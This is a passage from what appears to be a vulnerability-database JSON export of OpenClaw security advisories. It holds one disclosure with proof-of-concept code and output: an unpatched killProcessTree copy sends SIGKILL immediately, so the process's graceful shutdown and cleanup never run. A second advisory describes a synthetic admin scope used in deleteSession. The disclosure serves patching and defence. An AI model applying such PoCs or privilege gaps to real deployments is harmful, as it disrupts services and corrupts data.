from the patched `src/process/kill-tree.ts`.\n\n### Details\nCVE-2026-27486 fixed unsafe process termination by introducing a graceful shutdown sequence in `src/process/kill-tree.ts` — sending `SIGTERM` first, waiting a configurable grace period (default 3 seconds), then escalating to `SIGKILL` only if the process is still alive.\n\nHowever, an identical copy of the **unpatched** `killProcessTree` function remains in `src/agents/shell-utils.ts` (lines 170–192). This function sends `SIGKILL` immediately with no `SIGTERM`:\n\n```typescript\n// src/agents/shell-utils.ts:170-192\nexport function killProcessTree(pid: number): void {\n  // ... 
Windows handling ...\n  try {\n    process.kill(-pid, \"SIGKILL\"); // Immediate hard kill, no SIGTERM\n  } catch {\n    try {\n      process.kill(pid, \"SIGKILL\");\n    } catch {\n      // process already dead\n    }\n  }\n}\n```\n\nThe `!stop` chat command handler in `src/auto-reply/reply/bash-command.ts` imports and calls this vulnerable version at line 302:\n\n```typescript\n// src/auto-reply/reply/bash-command.ts:5\nimport { killProcessTree } from \"../../agents/shell-utils.js\";\n\n// src/auto-reply/reply/bash-command.ts:300-304\nconst pid = running.pid ?? running.child?.pid;\nif (pid) {\n  killProcessTree(pid);  // Calls the UNPATCHED version\n}\nmarkExited(running, null, \"SIGKILL\", \"failed\");\n```\n\nCompare this to the patched version in `src/process/kill-tree.ts`:\n\n```typescript\n// src/process/kill-tree.ts:46-78\nfunction killProcessTreeUnix(pid: number, graceMs: number): void {\n  // Step 1: Try graceful SIGTERM to process group\n  try {\n    process.kill(-pid, \"SIGTERM\");\n  } catch { /* ... */ }\n\n  // Step 2: Wait grace period, then SIGKILL if still alive\n  setTimeout(() => {\n    if (isProcessAlive(-pid)) {\n      try { process.kill(-pid, \"SIGKILL\"); } catch { /* ... */ }\n    }\n  }, graceMs).unref();\n}\n```\n\n### PoC\n\nThis PoC demonstrates the difference between the vulnerable and patched code paths inside a running OpenClaw Gateway container.\n\n**Setup:**\n```bash\n# Build and start the gateway container\ncd CVE-2026-27486-variant-exp/\ndocker compose up -d\nsleep 5\n```\n\n**Exploit (vulnerable `killProcessTree` from `shell-utils.ts`):**\n\nThe following script is injected into the container and executed. 
It starts a bash process that traps `SIGTERM` for graceful shutdown, then kills it using the same code path as `!stop`:\n\n```javascript\n// exploit_sigkill.cjs — replicates src/agents/shell-utils.ts:183-190\nconst { spawn } = require('child_process');\nconst fs = require('fs');\n\ntry { fs.unlinkSync('/tmp/graceful_shutdown.txt'); } catch {}\n\nconst child = spawn('/bin/bash', ['-c',\n  'trap \\'echo GRACEFUL_SHUTDOWN > /tmp/graceful_shutdown.txt; exit 0\\' SIGTERM; while true; do sleep 1; done'\n], { detached: true, stdio: 'ignore' });\nchild.unref();\n\nsetTimeout(() => {\n  // VULNERABLE: same as shell-utils.ts — SIGKILL only\n  try { process.kill(-child.pid, 'SIGKILL'); } catch {\n    try { process.kill(child.pid, 'SIGKILL'); } catch {}\n  }\n  setTimeout(() => {\n    if (fs.existsSync('/tmp/graceful_shutdown.txt')) {\n      console.log('[BLOCKED] SIGTERM was received.');\n      process.exit(1);\n    } else {\n      console.log('[EXPLOITED] SIGKILL sent directly — SIGTERM never delivered.');\n      process.exit(0);\n    }\n  }, 2000);\n}, 1000);\n```\n\n**Run:**\n```bash\npython3 poc_exploit.py\n```\n\n### Log of Evidence\n\n**Exploit output (SIGKILL only, no graceful shutdown):**\n```\n[*] Running exploit (vulnerable killProcessTree from shell-utils.ts)...\n[*] Victim PID: 78\n[*] Calling vulnerable killProcessTree (SIGKILL only, no SIGTERM)...\n[EXPLOITED] SIGKILL sent directly — SIGTERM never delivered.\n[EXPLOITED] Graceful shutdown handler was NEVER invoked.\n\n[SUCCESS] CVE-2026-27486 variant confirmed:\n  killProcessTree() in shell-utils.ts sends immediate SIGKILL,\n  bypassing the graceful shutdown fix in process/kill-tree.ts.\n```\n\n**Control output (SIGTERM first, graceful shutdown works):**\n```\n[*] Running control (patched killProcessTree from process/kill-tree.ts)...\n[*] Victim PID: 93\n[*] Calling patched killProcessTree (SIGTERM first, then SIGKILL after grace)...\n[NORMAL] SIGTERM received — graceful shutdown completed. 
Flag: GRACEFUL_SHUTDOWN\n\n[NORMAL] Control confirmed: patched killProcessTree sends SIGTERM first,\n         allowing graceful shutdown before escalating to SIGKILL.\n```\n\n### Impact\nWhen `!stop` is used, background processes are killed instantly via `SIGKILL` with no chance to perform cleanup. This can result in:\n\n- **Data corruption**: processes writing to files or databases are interrupted mid-write\n- **Resource leaks**: temporary files, lock files, and network connections are not properly released\n- **Security-sensitive cleanup skipped**: operations like erasing in-memory secrets or completing audit logs are bypassed\n\nThis is the same class of impact that CVE-2026-27486 was filed for — the fix simply missed the `shell-utils.ts` copy of the function.\n\n### Affected products\n- **Ecosystem**: npm\n- **Package name**: openclaw\n- **Affected versions**: <= 2026.3.14\n- **Patched versions**: <None>\n\n### Severity\n- **Severity**: Medium\n- **Vector string**: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H\n\n### Weaknesses\n- **CWE**: CWE-404: Improper Resource Shutdown or Release\n\n### Occurrences\n\n| Permalink | Description |\n| :--- | :--- |\n| [https://github.com/moltbot/moltbot/blob/f2849c2417/src/agents/shell-utils.ts#L170-L192](https://github.com/moltbot/moltbot/blob/f2849c2417/src/agents/shell-utils.ts#L170-L192) | The vulnerable `killProcessTree` function that sends immediate `SIGKILL` without `SIGTERM`. |\n| [https://github.com/moltbot/moltbot/blob/f2849c2417/src/auto-reply/reply/bash-command.ts#L5](https://github.com/moltbot/moltbot/blob/f2849c2417/src/auto-reply/reply/bash-command.ts#L5) | Import statement pulling the vulnerable `killProcessTree` from `shell-utils.ts` instead of the patched `kill-tree.ts`. 
|\n| [https://github.com/moltbot/moltbot/blob/f2849c2417/src/auto-reply/reply/bash-command.ts#L300-L304](https://github.com/moltbot/moltbot/blob/f2849c2417/src/auto-reply/reply/bash-command.ts#L300-L304) | The `!stop` handler calling the vulnerable `killProcessTree(pid)`. |\n| [https://github.com/moltbot/moltbot/blob/f2849c2417/src/process/kill-tree.ts#L46-L78](https://github.com/moltbot/moltbot/blob/f2849c2417/src/process/kill-tree.ts#L46-L78) | The **patched** `killProcessTreeUnix` with graceful `SIGTERM` → grace period → `SIGKILL` sequence (for reference). |","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35667","reference_id":"","reference_type":"","scores":[{"value":"0.00017","scoring_system":"epss","scoring_elements":"0.04185","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00017","scoring_system":"epss","scoring_elements":"0.04174","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35667"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3298-56p6-rpw2","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:14:31Z/"}],"url":"https://gi
thub.com/openclaw/openclaw/security/advisories/GHSA-3298-56p6-rpw2"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35667","reference_id":"CVE-2026-35667","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35667"},{"reference_url":"https://github.com/advisories/GHSA-3298-56p6-rpw2","reference_id":"GHSA-3298-56p6-rpw2","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3298-56p6-rpw2"},{"reference_url":"https://github.com/advisories/GHSA-jfv4-h8mc-jcp8","reference_id":"GHSA-jfv4-h8mc-jcp8","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-jfv4-h8mc-jcp8"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-improper-process-termination-via-unpatched-killprocesstree-in-shell-utils-ts","reference_id":"openclaw-improper-process-termination-via-unpatched-killprocesstree-in-shell-utils-ts","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:14:31Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-improper-process-termination-via-unpatched-killprocesstree-in-shell-utils-ts"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110567?format=json","purl":"pkg:npm/openclaw@2026.3.24","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-
1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5dj5-mk23-kyds"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-66nc-bn98-nbas"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-
96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-acy1-83py-efhr"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-
hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-
u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-utv2-tyje-kfht"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vv2u-u7mn-rfe1"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-
zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24"}],"aliases":["CVE-2026-35667","GHSA-3298-56p6-rpw2"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-cvxu-rdbu-abd2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91353?format=json","vulnerability_id":"VCID-cwd3-ecym-sfaw","summary":"OpenClaw: Gateway Plugin Subagent Fallback `deleteSession` Uses Synthetic `operator.admin`\n## Summary\n\nGateway Plugin Subagent Fallback `deleteSession` Uses Synthetic `operator.admin`\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nGateway plugin subagent fallback `deleteSession` previously dispatched `sessions.delete` with a synthetic `operator.admin` runtime scope when no request-scoped client existed. 
Commit `b5d785f1a59a56c3471f2cef328f7c9a6c15f3e7` binds deletion to the caller scope instead of minting admin scope.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `b5d785f1a59a56c3471f2cef328f7c9a6c15f3e7`.\n\n## Fix Commit(s)\n\n- `b5d785f1a59a56c3471f2cef328f7c9a6c15f3e7`","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35645","reference_id":"","reference_type":"","scores":[{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.15986","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.1603","published_at":"2026-06-06T12:55:00Z"},{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.1604","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35645"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/b5d785f1a59a56c3471f2cef328f7c9a6c15f3e7","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:11:49Z/"}],"url":"https://github.com/openclaw/openclaw/commit/b5d785f1a59a56c3471f2cef328f7c9a6c15f3e7"},{"reference_url":"http
s://github.com/openclaw/openclaw/security/advisories/GHSA-h4jx-hjr3-fhgc","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:11:49Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-h4jx-hjr3-fhgc"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35645","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35645"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-synthetic-operator-admin-in-deletesession","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:11:49Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-synthetic-operator-admin-in-deletesession"},{"reference_url":"https://github.com/advisories/GHSA-h4j
x-hjr3-fhgc","reference_id":"GHSA-h4jx-hjr3-fhgc","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-h4jx-hjr3-fhgc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vul
